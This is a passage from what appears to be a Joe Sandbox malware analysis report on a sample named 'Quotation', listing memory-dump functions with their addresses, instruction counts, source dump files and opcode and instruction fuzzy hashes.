                                          • Opcode Fuzzy Hash: e42f34bd63c8acf099e3ea33adba4eb4bc1e302db2792e80e4c7cad8e8545b89
                                          • Instruction Fuzzy Hash: 07E0B674E49208EFC784EFA8D5856ADBBF8AB49215F2084E9CC0993341E7329A56DB41
                                          Function 0578E68A Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 228b09dba4663092cbc69e63a1656c7716479285cc6f0bfc0566edb64e4a1566
                                          • Instruction ID: 31e7348ae183d46a3004e46d44df22f6a46a7ad574a1a7cbe32f6d1860311a4a
                                          • Opcode Fuzzy Hash: 228b09dba4663092cbc69e63a1656c7716479285cc6f0bfc0566edb64e4a1566
                                          • Instruction Fuzzy Hash: 36F0D474A0421C8FCB64DF68C8907EABBB2AB59300F2041D99599A7344DB715EC5CF01
                                          Function 05B97AF0 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc0ae003ef7af38c66cd02fbacbe6804dfa416e124c07d8e96581393c283d291
                                          • Instruction ID: e54e861d7264a3ee6f044959f47816d190771332fe6f5605aa406203ee8618e3
                                          • Opcode Fuzzy Hash: dc0ae003ef7af38c66cd02fbacbe6804dfa416e124c07d8e96581393c283d291
                                          • Instruction Fuzzy Hash: FCE01A74D08208ABCB45DBA4D5916ACFBF4EB4A300F1080E9C81853385DA316A52DB40
                                          Function 058D75C8 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22beb219318d97132d43f9ae74b150d6bd552aa2236b22b75605ce4fef10a278
                                          • Instruction ID: 6316e5bd9a9152b7638d3a56451e396d092303a9810430ae28fbc01b12337d20
                                          • Opcode Fuzzy Hash: 22beb219318d97132d43f9ae74b150d6bd552aa2236b22b75605ce4fef10a278
                                          • Instruction Fuzzy Hash: 36E09274A09208AFC784DBA8D5856ACFBF8EB49215F2084A9DC09D7341E6319E56CB91
                                          Function 058D8624 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa13c188c6aab937c48be9bdb95e39da0c750adfdda94bed3d71dd275021f55c
                                          • Instruction ID: cbdb80854d433385d49251ada009eb7222a664bef28bf7c39795511a0748fe52
                                          • Opcode Fuzzy Hash: fa13c188c6aab937c48be9bdb95e39da0c750adfdda94bed3d71dd275021f55c
                                          • Instruction Fuzzy Hash: B6E01A7554520CEFDF15DFD0C844BEEBBB6FB08308F108015A9166A2A8C7748D89DF60
                                          Function 058D8370 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cb04031c3c69a66a8f14377f86d2bcf2b5a07b3f7fef08368e20db8717b9ba5
                                          • Instruction ID: 6bae67289180228984f257bd2d59e8b1f03be2dbc0107f0a3a78afd5b3e1094c
                                          • Opcode Fuzzy Hash: 4cb04031c3c69a66a8f14377f86d2bcf2b5a07b3f7fef08368e20db8717b9ba5
                                          • Instruction Fuzzy Hash: 43E04F75545108EFDF119FD0C844AEDBFB7EB4E314F108141AD169A2A9CB348D499F10
                                          Function 05849CD9 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00fe12008470146d3800e8a59584df60cdc103489a99e4aa1302df00c4cf1cfe
                                          • Instruction ID: 529b25b7b78e155d03420c3b6f40bd08d5d4bafc4a8009dba05d921938aff814
                                          • Opcode Fuzzy Hash: 00fe12008470146d3800e8a59584df60cdc103489a99e4aa1302df00c4cf1cfe
                                          • Instruction Fuzzy Hash: 39D05E367006139BEB11D529F8957E737E3DB8970CB044238EC05C3304F921DD0506D1
                                          Function 0578D578 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea3742b6989c7e2e4cf1c487e0bc045881a852b8b0e851ea3d419c606be7bc07
                                          • Instruction ID: 18a9733cfd257700f6fc4e9e935e087e6dd6e6a70b9b1fc477c5657afac40b45
                                          • Opcode Fuzzy Hash: ea3742b6989c7e2e4cf1c487e0bc045881a852b8b0e851ea3d419c606be7bc07
                                          • Instruction Fuzzy Hash: 03E0C2B0D9920CEFC750EFB8E4452ACFFF9AB08201F2040AACC0893380EB304A55DB40
                                          Function 0578DE36 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75dc171815227d9449bffcd48200dfef24c647ca5e484e992c718c56325dc94a
                                          • Instruction ID: 2239ed546463616dd8c4c8bc439b97eb500224e56aa4e9d9d74236643a4b1990
                                          • Opcode Fuzzy Hash: 75dc171815227d9449bffcd48200dfef24c647ca5e484e992c718c56325dc94a
                                          • Instruction Fuzzy Hash: 67E01A70984208DFEB54EF88E485BBCBBB6FB42304F504056E412AB2D1CBB49C85EF11
                                          Function 0224A960 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a4e18cd23129e8461999b85828e6cee4bf8d1874ffa28f77e5d149f934f5ae9
                                          • Instruction ID: 57ccb690fef66afb7a3477acc2769e329716d5fd1c8380c8ed1dcf437bf30865
                                          • Opcode Fuzzy Hash: 3a4e18cd23129e8461999b85828e6cee4bf8d1874ffa28f77e5d149f934f5ae9
                                          • Instruction Fuzzy Hash: EBE0C272980208EFCB01EFF0D51966EBBF9DB06201F1005E5D50993200EF310E14DBA2
                                          Function 05B9CAF8 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 031d3d46cd6573b2c5fa21fa8cbaedaa10bae1c64cd97da960c06472c526f849
                                          • Instruction ID: e623d177b95e7ae3fafb67e1e3e830fa0697c66a844850cdd3ba8bb1e6d50190
                                          • Opcode Fuzzy Hash: 031d3d46cd6573b2c5fa21fa8cbaedaa10bae1c64cd97da960c06472c526f849
                                          • Instruction Fuzzy Hash: FCE0EC74A49208DBCB08DF94D58166DBBB9EB45315F20D1F9C80917341CA316E56DB81
                                          Function 058DBDB0 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: dc47b23d7e18a95b1f49737b5471d57c4cdc599f8517300b9f2830d525eb787f
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: ACE08C34908208DBC704EB94D94056CFBB8AB49305F208098CC0893380CA315E52CB90
                                          Function 058D6508 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: 0f7e19e1f51eb0618c4cd783798304c869fb80e5f4188b31d9f5981e11cc3ae7
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 13E08C74D4820CDBC704DF94E5405ACFBB8AB49304F208098CC0953344DA319E92CB90
                                          Function 058D6C10 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: 7c6874415b21e8764a17bf617fe99eeda01e7897050a9110157edf24dfccb47f
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: E7E08C74D4920CEBC704DF94E54056CFBB8EB49304F208498CC0853340E6316E56CB90
                                          Function 058D27D8 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: 19e14a1fb5f66da277e1931e18f5bc2aff4e6cc0044bc911954f9ee65f0b1060
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 77E08C3890C21CDBC754DF94D54196CFBB8AB46304F208098CC0953340CA316E52DB91
                                          Function 058D0390 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: 1a1430dc93fc01bc9d15f7e1d4c25962b8c962c15f1b0d6e597c1b9cd6dd2ef4
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 0DE08C34D0C208DBC708DB94D9446ACFBB8AB85304F208098CC4953340D6329E52CB90
                                          Function 058D0BA8 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: 8dfbd0b2ebbdf8e54514408450361073e3e060d7c968d31aad4f5550afe38958
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 23E08C35A0D208DBD704EFA4D58456CFBB8AB45308F2084A9CC0853341DA315E52CB95
                                          Function 058D3B00 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: fcb7eef40d427064887f7205dee783b5d0ea28e69995b52fae9cc7aa1880cd7d
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 7FE08C35E09208DBDB05DF94D54056CFBB8AB45304F2084A8CC0853340CA316E52CB91
                                          Function 058D4230 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: a28de684cc218b6b39311e03f8b55fd1e6b87a3a81ec208ead1ab7391d5d2f89
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 2AE0C274D08208DBCB04DF94D54156CFBF8EB56304F2080D8CC0C53350C6715E52CB90
                                          Function 058D1A48 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction ID: d034e5a4b4632355b60d2070bfb63512c52b4bd879c40be31a9aba34ec698fd5
                                          • Opcode Fuzzy Hash: 3c3c2410af195de9bab3e7e21848757a911d489db3dcce063de63b7c9e3e6b55
                                          • Instruction Fuzzy Hash: 9EE08C34E08208DBC704DF94D54456CFBB8AB45304F208099CC0867340CA315E52CB90
                                          Function 0578D7E0 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e39d2da2eb466bd465cd439df470d2f4ef503bc4312a3cf353c17698c7bc562d
                                          • Instruction ID: c64bf15fbe39e3a69d410cb277eee6b82face0586be77ddca59fd632e8072393
                                          • Opcode Fuzzy Hash: e39d2da2eb466bd465cd439df470d2f4ef503bc4312a3cf353c17698c7bc562d
                                          • Instruction Fuzzy Hash: 2BD01270D49208DFC724EBA4E5455BDBBB9A746301F1051A4D80923294C6701D56DA95
                                          Function 05B9EF98 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a52ad0ccb526a093170b20dd98dc5691f1f145953bd37acc5238a49c2b2dd82
                                          • Instruction ID: 648c2a966c526bf1910e40c6af9111914b2e95608e802d7a4d5f6cfb5e34d69a
                                          • Opcode Fuzzy Hash: 8a52ad0ccb526a093170b20dd98dc5691f1f145953bd37acc5238a49c2b2dd82
                                          • Instruction Fuzzy Hash: 53E01230A0120DEFDB04DFB4ED5176DB7FAEB45300F5085E8D5059B280EA316E009F91
                                          Function 058DA442 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12e3e54d27d7abe356eddf6fa6880f0d0ac7e1f2469283a6a36dca639f3a6d0e
                                          • Instruction ID: 2f209144059386ffa8ae013b936b23faa36d6c94b1d7f612dad070450392f1ca
                                          • Opcode Fuzzy Hash: 12e3e54d27d7abe356eddf6fa6880f0d0ac7e1f2469283a6a36dca639f3a6d0e
                                          • Instruction Fuzzy Hash: 8AE0E5B590011CDFDB60CF54C840BEEBBBAAB49300F1082D6A689EB280D7749E818F60
                                          Function 058D72E0 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f785c4b8b1ee78b840db11ca79cc35bf73ca749ff0a6e7a6f834f5cf20323fb2
                                          • Instruction ID: 535be3b97cb67d0574ecdf92fe3cda1988a56302fd20e561c6c6ee9626d1a627
                                          • Opcode Fuzzy Hash: f785c4b8b1ee78b840db11ca79cc35bf73ca749ff0a6e7a6f834f5cf20323fb2
                                          • Instruction Fuzzy Hash: 2FE0C234D08248DFC740DBA8C54036CFFF8EB4A205F1080D9DC0A93381DA319E52CB50
                                          Function 0224DEF8 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df70eae46aec1a664f96de27c522ab259562c8f4d6bfded0fed9576327807ebb
                                          • Instruction ID: eb8592751d14f76b53957ec57ba4abfdd8efe824d3b05aa1dd24877ec19e1449
                                          • Opcode Fuzzy Hash: df70eae46aec1a664f96de27c522ab259562c8f4d6bfded0fed9576327807ebb
                                          • Instruction Fuzzy Hash: 5FD0A770A19108DBC759CBD4D940A69F7BCDB46218F1085DCDC0C43385CF729D12CB80
                                          Function 05B9EF50 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac1dfb32ffb472bceb732847497fed6aaeb74c2a5c970d3e4fcd0dcb7282661b
                                          • Instruction ID: d64c23b085854acfe18a0b209b38325ab23366661a0474b801a91b64b6f4da40
                                          • Opcode Fuzzy Hash: ac1dfb32ffb472bceb732847497fed6aaeb74c2a5c970d3e4fcd0dcb7282661b
                                          • Instruction Fuzzy Hash: 3DE01270A0120DEFDB00EFB4E95169D77F9DB45311F1045A8E409D7340EA316E049B91
                                          Function 05849800 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7764b9bd2c4468adde0c32dfef951ba0d5204c68b22b83ab9e07d5f1bb847bf0
                                          • Instruction ID: 6ee73b14a5be87f58e1c72d7db4f78aebeee1df2bb7ae63b7053144a6cad4e3b
                                          • Opcode Fuzzy Hash: 7764b9bd2c4468adde0c32dfef951ba0d5204c68b22b83ab9e07d5f1bb847bf0
                                          • Instruction Fuzzy Hash: 0BD0EC311042069BD715DA28E450A8BBBA1AF85341B04CE3DA54A46524DB70AD498B80
                                          Function 0578DD52 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9be1a693d806aae30c83387a4c0b69a193ff3ab16d12f21b89fbf9283bc0abcc
                                          • Instruction ID: 3dcb4ac3347498df89bc22ecf20f5358fe819d7790c6a5df8bd1669bef85fcf6
                                          • Opcode Fuzzy Hash: 9be1a693d806aae30c83387a4c0b69a193ff3ab16d12f21b89fbf9283bc0abcc
                                          • Instruction Fuzzy Hash: 60E0E534A4521CDFCB54EF24D9853EDBAB2EF8A300F1041D8965A6B280CF701D81CF41
                                          Function 0578E152 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 642b8359dc5cda0b1d48b28675ef705383a981d88b52d31eba76bab9bb3c17ec
                                          • Instruction ID: a09f6fd36eee0a407761ffd3b08a2fa1a9eb102577581eeb6815f07afb1008da
                                          • Opcode Fuzzy Hash: 642b8359dc5cda0b1d48b28675ef705383a981d88b52d31eba76bab9bb3c17ec
                                          • Instruction Fuzzy Hash: 57E0E5349442188FCB94EB64D8847ADBB73EB49304F1080DA951A776A0DB705EC5CF41
                                          Function 0578E5C2 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445bed79ce0567554063e72b9fb548d021b95e4328e79916aa49072f96ce4b0d
                                          • Instruction ID: 29423ade56bf3e6dfebeaef24ee232770ccc9cb692e9c02756af6bdb4028a18b
                                          • Opcode Fuzzy Hash: 445bed79ce0567554063e72b9fb548d021b95e4328e79916aa49072f96ce4b0d
                                          • Instruction Fuzzy Hash: 5FE0E570940218CFDB64EFA4D8947AABB72EB8A310F1042DA940AB7280CB301D86CF20
                                          Function 0578E1A8 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e184c8395c3e7ed98f3389a5fa43bfc2d82e43e1ca281ce3df8d264a5e5cab72
                                          • Instruction ID: 8711fd904232105b94768568297f9d7a5d3b1e16ad46e444af7d67da66af3d0e
                                          • Opcode Fuzzy Hash: e184c8395c3e7ed98f3389a5fa43bfc2d82e43e1ca281ce3df8d264a5e5cab72
                                          • Instruction Fuzzy Hash: 68E0E5309405188FCB24EF60D8857ADBA72FB4A300F0046DAD61B77294CB705D81CF00
                                          Function 0578E0FC Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cbcac882e5f6a074b641da5e495e78ad9159f849c8f7d85ed57b134d566aca1
                                          • Instruction ID: 0591fb32bcbb03009c7e95842906e9d2e6c9602e687b571bd78633224bca0963
                                          • Opcode Fuzzy Hash: 4cbcac882e5f6a074b641da5e495e78ad9159f849c8f7d85ed57b134d566aca1
                                          • Instruction Fuzzy Hash: BBE0E530A442189FCBA4EB50D8947AEBAB2EF46310F1040D9951E67390CF345DC5CF01
                                          Function 0578E304 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d77deb7f431d174c210a86c1d9510913000360d8c8024a504660639f61b9350
                                          • Instruction ID: 04c0c570cccab14dc9edc9ce42800f8dbc7a8f5e645178e084bc4d847a3bfffa
                                          • Opcode Fuzzy Hash: 3d77deb7f431d174c210a86c1d9510913000360d8c8024a504660639f61b9350
                                          • Instruction Fuzzy Hash: 16E01A70940118CFCB64EF64D8957ADBB72EB89310F1086DA961B77290CF301D85CF01
                                          Function 0578DEAD Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72915e65cbb5cb3ea668ec2f9c617cd9b029d820987e8f3fb8e6fb8b286b23b8
                                          • Instruction ID: 6d14dcdc75c3c64e11addfe7bf5b2a0e24347cc0a29f365cefa128c184fc9d7a
                                          • Opcode Fuzzy Hash: 72915e65cbb5cb3ea668ec2f9c617cd9b029d820987e8f3fb8e6fb8b286b23b8
